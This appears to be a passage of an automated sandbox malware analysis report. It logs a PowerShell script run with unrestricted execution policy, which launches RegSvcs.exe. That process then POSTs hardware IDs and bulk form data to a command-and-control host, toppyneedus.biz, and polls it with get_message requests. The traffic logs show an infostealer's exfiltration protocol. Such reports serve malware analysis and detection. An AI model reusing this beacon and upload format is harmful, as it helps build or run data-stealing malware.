                                                                            Data Ascii: Q52PbeT8xl2W4cQIcAa1iQJkttI+QaN7fAbI9P175DJX0YVmo6uDHt+iwho5UvqvC32wjnYAvT5oSs/1sCmlO1DYgmynq4VMkOTXAnQAqIQNc7HYIUOkdnoG2vDwcu57FJ2PeeT8xn2G9M8FdRyxjwVgscVsDuJhdhuIoeZh8jxFk5Eho6jGBtHkzAR+DLScA3Cz2iVJpnhyCsz993TmN1Hai26grYhXnqKLQn4S+tZGV6fWIE3ibz8TiP78Mb1
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 45 47 76 73 6f 4e 5a 68 36 44 77 41 58 63 45 76 5a 68 47 61 59 4f 62 62 45 2b 34 4d 43 6b 7a 30 62 6e 33 66 61 56 6a 47 73 69 50 59 61 4f 2b 6b 46 6d 64 38 38 34 50 64 53 69 31 69 52 42 31 73 39 59 39 53 65 35 37 66 45 71 47 75 66 64 70 70 57 4d 61 38 6f 39 33 70 34 75 46 54 35 69 69 69 30 4a 2b 48 50 72 57 52 6b 6a 38 78 79 39 51 6f 58 39 67 4e 49 69 68 36 55 2b 6c 4d 45 7a 61 6d 47 4b 79 72 34 74 53 67 4e 79 46 57 69 31 59 36 4e 78 55 4a 4b 4f 56 4d 33 2f 73 4d 48 42 4b 6b 4d 44 70 4d 66 4e 37 41 6f 2f 47 49 62 62 6b 33 68 37 57 34 64 63 51 66 77 6d 73 6a 55 46 49 67 76 49 36 53 71 56 67 64 68 33 48 75 62 34 78 36 6e 73 43 35 4d 68 6f 6f 37 2b 58 53 4a 7a 79 77 6b 4a 47 52 50 71 57 52 69 37 38 34 43 39 4f 72 48 64 6e 47 34 58 65 35 6e 76 69 4b 31 33 4b
                                                                            Data Ascii: EGvsoNZh6DwAXcEvZhGaYObbE+4MCkz0bn3faVjGsiPYaO+kFmd884PdSi1iRB1s9Y9Se57fEqGufdppWMa8o93p4uFT5iii0J+HPrWRkj8xy9QoX9gNIih6U+lMEzamGKyr4tSgNyFWi1Y6NxUJKOVM3/sMHBKkMDpMfN7Ao/GIbbk3h7W4dcQfwmsjUFIgvI6SqVgdh3Hub4x6nsC5Mhoo7+XSJzywkJGRPqWRi784C9OrHdnG4Xe5nviK13K
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 53 54 56 5a 33 6b 79 42 63 32 47 36 79 4e 45 48 48 77 33 54 31 4e 72 6a 42 4f 52 49 6a 68 73 43 6d 6c 44 6c 6e 54 68 6d 61 79 74 63 74 2b 6d 75 37 47 44 6e 67 4e 2b 73 42 47 63 50 79 4e 66 77 37 69 64 47 42 4b 6b 4b 6d 69 4b 72 42 6f 44 59 33 61 66 75 71 39 78 6b 6a 52 75 70 64 4d 4f 52 6a 36 31 6b 59 78 76 38 63 2b 52 71 46 6d 63 6b 33 32 78 2f 46 38 36 6e 64 55 31 6f 68 6d 74 4c 4b 64 45 70 6e 68 33 78 68 48 4e 4a 47 43 41 48 47 6d 30 69 70 6d 67 6a 41 2f 53 73 65 35 71 45 69 6c 63 78 72 69 78 69 47 38 35 4e 34 65 70 4f 48 4c 44 48 34 63 71 38 4d 75 56 59 62 76 62 6d 79 6c 5a 54 4d 2b 7a 2b 6e 68 65 75 67 33 47 70 50 49 5a 2b 54 38 31 68 44 52 35 74 52 43 49 56 72 6f 31 56 4d 6c 36 34 56 2b 58 2b 78 70 4d 52 79 49 6f 61 49 2f 70 53 6b 61 68 63 67 6d 70
                                                                            Data Ascii: STVZ3kyBc2G6yNEHHw3T1NrjBORIjhsCmlDlnThmaytct+mu7GDngN+sBGcPyNfw7idGBKkKmiKrBoDY3afuq9xkjRupdMORj61kYxv8c+RqFmck32x/F86ndU1ohmtLKdEpnh3xhHNJGCAHGm0ipmgjA/Sse5qEilcxrixiG85N4epOHLDH4cq8MuVYbvbmylZTM+z+nheug3GpPIZ+T81hDR5tRCIVro1VMl64V+X+xpMRyIoaI/pSkahcgmp
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 52 38 49 56 61 4f 55 32 30 67 77 64 31 73 74 59 2b 55 71 52 7a 5a 77 6d 50 78 38 35 55 36 44 5a 66 30 34 39 66 6d 6f 57 4d 54 70 7a 74 77 6b 42 5a 44 61 79 4e 4f 45 69 4c 78 43 74 51 34 46 5a 79 48 4d 75 35 76 6a 48 39 65 77 4b 64 71 57 75 30 71 59 6c 5a 30 38 4c 43 46 48 70 4b 39 4d 34 43 4e 75 53 56 43 55 32 76 64 58 38 4e 69 74 6a 36 59 65 67 30 58 5a 2b 6f 5a 72 4b 6e 78 68 44 52 37 6f 56 61 4f 51 75 77 6e 67 74 35 75 35 6b 72 57 71 55 77 50 30 72 47 75 61 67 78 35 44 46 4b 30 49 64 6d 36 4b 4b 49 55 4e 48 39 69 78 73 35 48 50 72 57 56 54 6a 38 78 32 77 59 34 6a 64 79 47 4e 72 2f 38 32 66 6d 66 47 54 6a 70 58 4f 6a 74 49 55 63 6f 4f 2f 42 46 47 77 4a 71 6f 6b 34 53 4a 48 48 4b 31 43 68 4d 6b 41 63 79 2f 6e 2b 64 71 56 31 47 73 58 49 4f 65 53 4a 6c 46
                                                                            Data Ascii: R8IVaOU20gwd1stY+UqRzZwmPx85U6DZf049fmoWMTpztwkBZDayNOEiLxCtQ4FZyHMu5vjH9ewKdqWu0qYlZ08LCFHpK9M4CNuSVCU2vdX8Nitj6Yeg0XZ+oZrKnxhDR7oVaOQuwngt5u5krWqUwP0rGuagx5DFK0Idm6KKIUNH9ixs5HPrWVTj8x2wY4jdyGNr/82fmfGTjpXOjtIUcoO/BFGwJqok4SJHHK1ChMkAcy/n+dqV1GsXIOeSJlF


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49759        104.21.29.142   443               8024  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 14:58:23 UTC  279                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=69MNZEJ5HAECH070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12831
Host: toppyneedus.biz
2025-01-27 14:58:23 UTC  12831              OUT        Data Ascii: --69MNZEJ5HAECH070Content-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--69MNZEJ5HAECH070Content-Disposition: form-data; name="pid"2--69MNZEJ5HAECH070Content-Disposition: form-data; name="lid"NNaWCM--WORK--69M
2025-01-27 14:58:24 UTC  1122               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 14:58:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7hrkinfh2us9je844b4sd44fdn; expires=Fri, 23 May 2025 08:45:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FZFFtQSmx5PvsEVvaI1ubEGBCxsXhMGkG3nFwoBoiCgGBBtbPwia3fPoCMMDqrBVweZh1bBaEBRFybtWHcuWngDQ76vv%2Bj7ZklP0cvUOuCls1YbZyxPAoWwsvwmjcNTgh0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 908999c058810cac-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1706&rtt_var=645&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13768&delivery_rate=1688837&cwnd=234&unsent_bytes=0&cid=49224691215c9383&ts=744&x=0"
2025-01-27 14:58:24 UTC  20                 IN         Data Ascii: fok 8.46.123.189
2025-01-27 14:58:24 UTC  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49771        104.21.29.142   443               8024  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 14:58:24 UTC  273                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=O3L3XFLJLH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15027
Host: toppyneedus.biz
2025-01-27 14:58:24 UTC  15027              OUT        Data Ascii: --O3L3XFLJLHContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--O3L3XFLJLHContent-Disposition: form-data; name="pid"2--O3L3XFLJLHContent-Disposition: form-data; name="lid"NNaWCM--WORK--O3L3XFLJLHContent-D
2025-01-27 14:58:25 UTC  1126               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 14:58:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1i3ehf7k2jbqmm29g1uil0spa2; expires=Fri, 23 May 2025 08:45:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzF9BSQC4cjZdnSnGeEkMddO9ldAOclcHWGzC84d5jxyMftAJ%2FZtEou4HMI7W004h35krq1FOsdm8W7gp78WXyKA%2Fs9d5%2Fzt1Acp7MFJNv1KXWh5Vkuqrfy4bzUrF0xDdsY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 908999c81e3fc475-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1459&rtt_var=570&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15958&delivery_rate=1883870&cwnd=181&unsent_bytes=0&cid=95b18db3ed5dfae8&ts=888&x=0"
2025-01-27 14:58:25 UTC  20                 IN         Data Ascii: fok 8.46.123.189
2025-01-27 14:58:25 UTC  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49782        104.21.29.142   443               8024  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 14:58:26 UTC  277                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=FEGAA9ZO8PKK2G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20376
Host: toppyneedus.biz
2025-01-27 14:58:26 UTC  15331              OUT        Data Ascii: --FEGAA9ZO8PKK2GContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--FEGAA9ZO8PKK2GContent-Disposition: form-data; name="pid"3--FEGAA9ZO8PKK2GContent-Disposition: form-data; name="lid"NNaWCM--WORK--FEGAA9ZO8
2025-01-27 14:58:26 UTC  5045               OUT        Data Raw: [binary, non-printable]
2025-01-27 14:58:26 UTC  1127               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 14:58:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=o2upuqh1og3jm8k007ma212lrq; expires=Fri, 23 May 2025 08:45:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIOgdBFPT8n6ma2JjBsJ8QufUv7Lngx62LgJ5D18Ip4eug6gYaXXD57lvt20Vml0UW%2FuQYYR9KqLGLJDuDGUscot%2Fgd%2BVYOhIFKs3FUuQ6JHU6rMdwtOv8V1tNKSXY3Whqo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 908999d11867423e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1541&rtt_var=608&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21333&delivery_rate=1757977&cwnd=202&unsent_bytes=0&cid=67729e0a7f1527d5&ts=959&x=0"
2025-01-27 14:58:26 UTC  20                 IN         Data Ascii: fok 8.46.123.189
2025-01-27 14:58:26 UTC  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49791        104.21.29.142   443               8024  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 14:58:27 UTC  277                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GGL558OSKC7I9LM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 2610
Host: toppyneedus.biz
2025-01-27 14:58:27 UTC  2610               OUT        Data Ascii: --GGL558OSKC7I9LMContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--GGL558OSKC7I9LMContent-Disposition: form-data; name="pid"1--GGL558OSKC7I9LMContent-Disposition: form-data; name="lid"NNaWCM--WORK--GGL558
2025-01-27 14:58:28 UTC  1124               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 14:58:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1c8r8j11mjvaesbk78jqe4fgu6; expires=Fri, 23 May 2025 08:45:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OeH5UgaC7s3fKuUZiS6J%2B9k1JEhLsFe6rFMOeAhxKeuS1axjf4q9NvSi7JPcH054rvWFKBtsKn4BmBLF4ZGXqrTcsa2FsAf6Iyyuo0EOKD9iTmeGn%2B8PK%2BPLkNNfARcOxQU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 908999da8be94414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1727&rtt_var=662&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2838&recv_bytes=3523&delivery_rate=1634938&cwnd=180&unsent_bytes=0&cid=3444e6774e37f9c6&ts=874&x=0"
2025-01-27 14:58:28 UTC  20                 IN         Data Ascii: fok 8.46.123.189
2025-01-27 14:58:28 UTC  5                  IN         Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.749802104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:29 UTC272OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=RVMKHS8I
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 150286
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:29 UTC | 15331 | OUT | Data Raw: 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                            Data Ascii: --RVMKHS8IContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--RVMKHS8IContent-Disposition: form-data; name="pid"1--RVMKHS8IContent-Disposition: form-data; name="lid"NNaWCM--WORK--RVMKHS8IContent-Dispositi
                                                                            2025-01-27 14:58:32 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:32 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=d6fvf7eqtndbmh2qkp0l9th151; expires=Fri, 23 May 2025 08:45:09 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdimrRkwRnUkYwdB05Wo0B37cNyGLqT%2F5McsctmPkYWiZ0FC17dGdRsPYNF0uvcNue1h8zIRcYIznQddCgCOAw4R05N08C3R%2BTfSojtO1xFS1quyMhFut6SDKGfuQalaxIE%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999e42d030f99-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1596&rtt_var=929&sent=56&recv=160&lost=0&retrans=0&sent_bytes=2839&recv_bytes=151612&delivery_rate=1000685&cwnd=172&unsent_bytes=0&cid=09dfda5cd1e05377&ts=3551&x=0"


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2025-01-27 14:58:33 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 81
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:33 UTC | 81 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 26 6a 3d 26 68 77 69 64 3d 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45
                                                                            Data Ascii: act=get_message&ver=4.0&lid=NNaWCM--WORK&j=&hwid=2CDE6C0265185D724654FD9A0884370E
                                                                            2025-01-27 14:58:33 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6ssc642ic5mmpbs8o1gs6kkdvi; expires=Fri, 23 May 2025 08:45:12 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGbleG8N337FOAx%2FP54akmeFtA8G%2F4H2joVJfYPfq%2FZYAe7FTULwiPgCxBx8ylJUnTipg1X7BpucE%2Fw%2BA1IouKvQakoiHZQjDRFTNMXaFrgmqogU6QejTBE6nRMZdgnHPKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999fdb82f41c3-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1672&rtt_var=907&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=980&delivery_rate=1044722&cwnd=72&unsent_bytes=0&cid=6c3dcc20026471ca&ts=776&x=0"
                                                                            2025-01-27 14:58:33 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6f 37 54 4c 4c 50 37 75 49 59 51 6c 78 6a 52 7a 51 6e 66 74 65 77 30 51 77 52 30 71 50 4f 39 73 67 6c 31 57 41 39 33 77 2f 4b 50 34 36 51 3d 3d 0d 0a
                                                                            Data Ascii: 30o7TLLP7uIYQlxjRzQnftew0QwR0qPO9sgl1WA93w/KP46Q==
                                                                            2025-01-27 14:58:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0

                                                                            Target ID:0
                                                                            Start time:09:58:15
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"
                                                                            Imagebase:0x7ff741d30000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:09:58:15
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff75da10000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:09:58:18
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                            Imagebase:0xd60000
                                                                            File size:45'984 bytes
                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:09:58:18
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
                                                                            Imagebase:0x7ff73e620000
                                                                            File size:229'728 bytes
                                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e0ad0479e28600c6450be2285166dc21ce2d527386ae111416ea2d5f427732a
                                                                            • Instruction ID: 708cee9ea0cb7ec7102788f440fa9037315eef3113ec974db13a2e0a25b73c51
                                                                            • Opcode Fuzzy Hash: 6e0ad0479e28600c6450be2285166dc21ce2d527386ae111416ea2d5f427732a
                                                                            • Instruction Fuzzy Hash: 9A012D71908A4D8FDF85EF68C458AA97BF0FF69300F0445AAD419C71A1DB359949CB41
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction ID: 910827682fc1cf058746adb8774e728e94f759da779de6ab5ddbfcd33ee06f0d
                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction Fuzzy Hash: 5401677111CB0D8FDB44EF0CE451AB6B7E0FB99364F10056EE58AC3661D636E882CB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9cc769ceafa414470ef7825602db3908bb8096af9e8e437c451c368dc1156f3
                                                                            • Instruction ID: 00acf9e578268fcf430d7b1d0f3d0326c0c7e607742a54d1d6a38049e6c2c69a
                                                                            • Opcode Fuzzy Hash: a9cc769ceafa414470ef7825602db3908bb8096af9e8e437c451c368dc1156f3
                                                                            • Instruction Fuzzy Hash: 94F02B33E6A91F8FF251671CA40A1AA77C4FF11350B8581B6E40FC7061DD09981942C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 518b59ef5ce4bb795ebda41ff225531e08c198866228df31cfa6cf50de7dd2bc
                                                                            • Instruction ID: 3e8eef9609d83cac578a27fe31e6da4ff2312935a5e715fed4e75454425d592b
